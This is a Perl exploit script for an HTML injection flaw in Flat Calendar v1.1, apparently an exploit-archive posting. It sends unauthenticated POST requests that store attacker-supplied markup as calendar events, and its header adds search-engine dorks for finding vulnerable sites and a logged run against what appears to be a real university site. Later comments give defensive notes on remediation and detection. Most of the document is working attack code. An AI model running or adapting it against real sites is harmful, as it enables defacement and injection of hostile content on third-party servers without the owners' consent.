Flat Calendar 1.1 HTML Injection
Posted on 09 December 2014
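#!/usr/bin/perl -w
#Title    : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author   : ZoRLu / zorlu@milw00rm.com
#Website  : http://milw00rm.com / its online
#Twitter  : https://twitter.com/milw00rm or @milw00rm
#Test     : Windows7 Ultimate
#Date     : 08/12/2014
#Thks     : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam  : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (in alphabetical order :)) )
#Dork1    : intext:"Flat Calendar is powered by Flat File DB"
#Dork2    : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://localhost / index.html ZoRLu
#Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://jcbc.jesus.cam.ac.uk
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709

# Reviewer notes (defensive reading of this PoC):
#  - What it exercises: one POST per line of a local file to
#    <url><path>admin/calAdd.php with the form fields event, description,
#    month, day, year and submitted. The description field carries the
#    file's line unmodified.
#  - The script attaches no cookie, session or credential, so a
#    "Record Added" response means the add-event handler under admin/
#    accepted an anonymous request.
#  - Whether the submitted markup is rendered depends on viewEvent.php /
#    calendar.php emitting the stored description without HTML-encoding.
#    The script does not verify that; it only locates the event URL.
#  - Remediation on the application side: put access control in front of
#    the admin/ handlers, HTML-encode stored fields when they are written
#    into a page (in PHP, htmlspecialchars() with ENT_QUOTES), and validate
#    month/day/year server-side.
#  - Detection: POST requests to admin/calAdd.php in the access log from
#    clients that never authenticated. This script does not override the
#    LWP default User-Agent, which begins with "libwww-perl/".

use strict;
use warnings;

use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;

# Clear the terminal and print the command-line usage text.
sub hlp {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print "\nUsage: perl $0 http://target.com /calender_path/ indexfile nickname\n";
    print "Exam1: perl $0 http://localhost / index.html ZoRLu\n";
    print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu\n";
    return;
}

# Exactly four arguments are required: base URL, calendar path, local
# file whose lines become event descriptions, and the "submitted" name.
if (@ARGV != 4) {
    hlp();
    exit();
}

my $ua = LWP::UserAgent->new;
my ($url, $path, $index, $nick) = @ARGV;

# Add-event handler of the calendar; requested without any credentials.
my $vuln = $url . $path . "admin/calAdd.php";

print "\n[+] Target: " . $url . "\n";
print "[+] Path: " . $path . "\n";
print "[+] index: " . $index . "\n";
print "[+] Nick: " . $nick . "\n\n";

# The event is dated today, using the English month name the form expects.
my @months = qw(January February March April May June July
                August September October November December);
my ($day, $month, $yearset) = (localtime)[3, 4, 5];
my $year = 1900 + $yearset;
my $moon = $months[$month];

# Text the application returns after storing an event, and the link
# prefix used to locate the stored event on the calendar page.
my $added_marker = "Record Added: taking you back";
my $event_marker = "viewEvent.php?eventNumber=";

# Three-argument open with an explicit read mode: the file name comes from
# the command line, and the two-argument form would let characters in it
# be interpreted as an open mode or a pipe.
if (open(my $fh, '<', $index)) {
    while (my $row = <$fh>) {
        chomp $row;

        # One request, and therefore one calendar event, per input line.
        my $req = POST $vuln, [
            event       => 'Test Page',
            description => $row,
            month       => $moon,
            day         => $day,
            year        => $year,
            submitted   => $nick,
        ];
        my $resp = $ua->request($req);

        if (!$resp->is_success) {
            print "[-] HTTP POST error code: ", $resp->code, "\n";
            print "[-] HTTP POST error message: ", $resp->message, "\n";
            next;
        }

        # Literal substring test; the marker is plain text, not a pattern.
        if (index($resp->decoded_content, $added_marker) < 0) {
            print "[-] Exploit Failed\n";
            next;
        }
        print "[+] Exploit Succes\n";

        # Read the calendar page back to find the newest event link.
        my $listing = $ua->get($url . $path . "calendar.php");
        if (!$listing->is_success) {
            # This request is a GET, so it is labelled as such.
            print "[-] HTTP GET error code: ", $listing->code, "\n";
            print "[-] HTTP GET error message: ", $listing->message, "\n";
            next;
        }

        my $page  = $listing->decoded_content;
        my $first = rindex($page, $event_marker);
        print "[+] Searching url...\n";

        # rindex returns -1 when the link is absent; without this check
        # the slice below would report unrelated page text as the number.
        if ($first < 0) {
            print "[-] No viewEvent.php link found on calendar.php\n";
            next;
        }

        # Fixed four-character slice after the marker, as in the original;
        # for shorter event numbers it can include trailing non-digits.
        my $request = substr($page, $first + length($event_marker), 4);
        print "[+] YourEventNumber = $request\n";
        sleep(1);
        print "[+] " . $url . $path . "viewEvent.php?eventNumber=" . $request . "\n";
    }
    close $fh;
}
else {
    sleep(1);
    die("[-] NotFound: $index\n");
}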
